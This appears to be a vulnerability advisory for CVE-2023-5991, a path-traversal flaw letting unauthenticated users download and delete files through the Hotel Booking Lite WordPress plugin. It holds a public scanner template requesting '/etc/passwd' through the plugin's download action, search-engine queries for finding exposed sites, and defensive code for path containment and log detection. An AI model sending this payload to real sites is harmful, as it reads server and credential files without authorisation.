CVE-2023-5991: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion

Date: 2025-08-01 | Affected software: Hotel Booking Lite | PoC: public

Vulnerability description

The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths supplied via user input and lacks proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server.
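The missing path validation is the root cause of the file-download half of this issue. The following is an added example (not the plugin's own code) of the containment check a download handler needs: the user-supplied name is resolved relative to a hypothetical export directory and rejected if the resolved path leaves that directory. The CSRF and authorisation gaps described above need separate fixes (in WordPress terms, a nonce check and a capability check) and are not shown here. The directory layout and file names below are constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional


def resolve_download_path(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of `requested` inside `base_dir`, or None
    when the request would escape the directory (traversal, absolute path,
    or a symlink pointing outside) or does not name a regular file."""
    base = os.path.realpath(base_dir)
    # Absolute paths and empty names are never legitimate download targets.
    if not requested or os.path.isabs(requested):
        return None
    # realpath collapses "..", and follows symlinks, so the containment test
    # below sees where the file really lives.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath is a proper containment test; a plain startswith() would
    # accept a sibling such as /var/exports-evil when base is /var/exports.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> dict:
    """Build a throwaway export directory (constructed sample data) and
    exercise the check with a legitimate name, a traversal attempt and an
    absolute path. Returns whether each request was allowed."""
    with tempfile.TemporaryDirectory() as tmp:
        export_dir = os.path.join(tmp, "exports")
        os.makedirs(export_dir)
        Path(export_dir, "bookings.csv").write_text("id,guest\n1,alice\n")
        # A file one level above the export directory that must stay unreachable.
        Path(tmp, "secret.txt").write_text("not for download\n")
        return {
            "plain name": resolve_download_path(export_dir, "bookings.csv") is not None,
            "traversal": resolve_download_path(export_dir, "../secret.txt") is not None,
            "absolute": resolve_download_path(export_dir, "/etc/hostname") is not None,
        }


if __name__ == "__main__":
    for request, allowed in demo().items():
        print(f"{request:>10}: {'allowed' if allowed else 'rejected'}")
```

The same containment check applies to the delete action: any handler that takes a file name from the request must resolve it against the directory it is meant to serve before touching the filesystem.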

PoC code [public]

id: CVE-2023-5991

info:
  name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
  author: s4e-io
  severity: critical
  description: |
    The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
  remediation: Fixed in 4.8.5
  reference:
    - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5991
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5991
    cwe-id: CWE-22
    epss-score: 0.82047
    epss-percentile: 0.99168
    cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: motopress
    product: hotel_booking_lite
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking
    fofa-query: body=/wp-content/plugins/motopress-hotel-booking
    publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
  tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress

http:
  - method: GET
    path:
      - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "filename="
          - "/etc/passwd"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100925b411215e33e2d3104a0f67eb4b9e0dee764ef80afd7a7c10b18750686397d02200d6b35aeacb465b02518af35089b3b5b8375138702f57065a1a27c760950efe9:922c64590222798bb761d5b6d8e72950
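The template above checks a live target; a defender reviewing web server logs wants the reverse, a rule that flags past attempts against the same endpoint. The following is an added example (not part of the template or the page) that parses Apache/Nginx combined-format access log lines and reports requests carrying `mphb_action=download` together with a `filename` that points outside the intended directory, including percent-encoded and double-encoded forms. The log lines are constructed for the demonstration and are not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format; only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A ".." path component, with either separator, anywhere in the name.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def is_suspicious_download(target: str) -> bool:
    """True when the request target invokes the download action with a
    filename that leaves the intended directory."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "download" not in params.get("mphb_action", []):
        return False
    for once_decoded in params.get("filename", []):
        # parse_qs already decoded one layer; decoding again catches
        # double-encoded dots such as %252e%252e.
        name = unquote(once_decoded)
        if name.startswith("/") or TRAVERSAL_RE.search(name):
            return True
    return False


def scan_log(lines):
    """Return (ip, timestamp, status, target) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_suspicious_download(m["target"]):
            hits.append((m["ip"], m["ts"], int(m["status"]), m["target"]))
    return hits


# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Aug/2025:10:00:01 +0000] "GET /?filename=../../../../etc/passwd&mphb_action=download HTTP/1.1" 200 2311',
    '203.0.113.10 - - [01/Aug/2025:10:00:02 +0000] "GET /?filename=..%2F..%2F..%2Fetc%2Fpasswd&mphb_action=download HTTP/1.1" 200 2311',
    '198.51.100.7 - - [01/Aug/2025:10:05:13 +0000] "GET /?filename=bookings.csv&mphb_action=download HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Aug/2025:10:06:00 +0000] "GET /wp-content/plugins/motopress-hotel-booking/readme.txt HTTP/1.1" 200 9000',
    '192.0.2.44 - - [01/Aug/2025:10:07:45 +0000] "GET /?filename=%2e%2e/%2e%2e/etc/passwd&mphb_action=download HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, ts, status, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {target}")
```

A flagged request with status 200 and a non-trivial response size indicates the file was likely served and the host should be treated as exposed until the plugin is confirmed to be at 4.8.5 or later; a 404 (as in the last sample line) still records an attempt worth correlating with other activity from that source.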